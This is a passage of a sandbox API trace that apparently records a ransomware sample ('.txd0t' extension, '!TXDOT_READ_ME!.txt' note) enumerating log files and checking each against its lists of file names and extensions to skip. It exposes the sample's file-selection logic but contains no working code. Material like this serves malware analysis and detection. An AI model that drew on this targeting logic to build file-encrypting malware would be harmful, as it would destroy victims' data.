psz2="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0071.882] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned=".evtx" [0071.882] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.882] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=" ransom ") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="debug.txt") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="boot.ini") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntldr") returned -1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.883] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned=".evtx" [0071.883] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.883] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.883] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.883] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.883] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.883] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.883] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.883] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cAlternateFileName="MI8270~1.EVT")) returned 1 [0071.883] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=".") returned 1 [0071.883] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="..") returned 1 [0071.883] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.883] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.883] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcp-Client%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" [0071.883] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned=".evtx" [0071.883] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.883] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2=" ransom ") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="debug.txt") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="boot.ini") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntldr") returned -1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.884] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned=".evtx" [0071.884] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.884] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.884] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.884] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.884] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.884] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.884] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.884] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cAlternateFileName="MIEBFF~1.EVT")) returned 1 [0071.884] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=".") returned 1 [0071.884] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="..") returned 1 [0071.884] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.884] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.884] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0071.884] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned=".evtx" [0071.884] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.884] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=" ransom ") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="debug.txt") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="boot.ini") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntldr") returned -1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.885] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned=".evtx" [0071.885] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.885] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.885] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.885] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.885] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.885] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.885] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.885] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0071.885] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=".") returned 1 [0071.885] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="..") returned 1 [0071.885] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.885] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.885] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0071.885] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned=".evtx" [0071.885] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.885] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=" ransom ") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="debug.txt") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="boot.ini") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntldr") returned -1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.886] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.886] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned=".evtx" [0071.886] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.886] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.886] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.886] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.886] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.886] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.886] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.886] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0071.886] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=".") returned 1 [0071.886] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="..") returned 1 [0071.886] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.886] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.886] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0071.886] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned=".evtx" [0071.887] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=" ransom ") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="debug.txt") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="boot.ini") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntldr") returned -1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.887] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.887] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned=".evtx" [0071.887] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.887] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.887] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.887] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.887] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.887] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.887] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.887] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0071.887] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=".") returned 1 [0071.887] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="..") returned 1 [0071.887] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.888] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.888] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" [0071.888] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned=".evtx" [0071.888] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=" ransom ") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="debug.txt") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="boot.ini") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntldr") returned -1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.888] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.888] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned=".evtx" [0071.888] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.888] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.888] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.888] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.888] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.888] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.888] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.888] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0071.888] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=".") returned 1 [0071.888] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="..") returned 1 [0071.888] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.889] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: 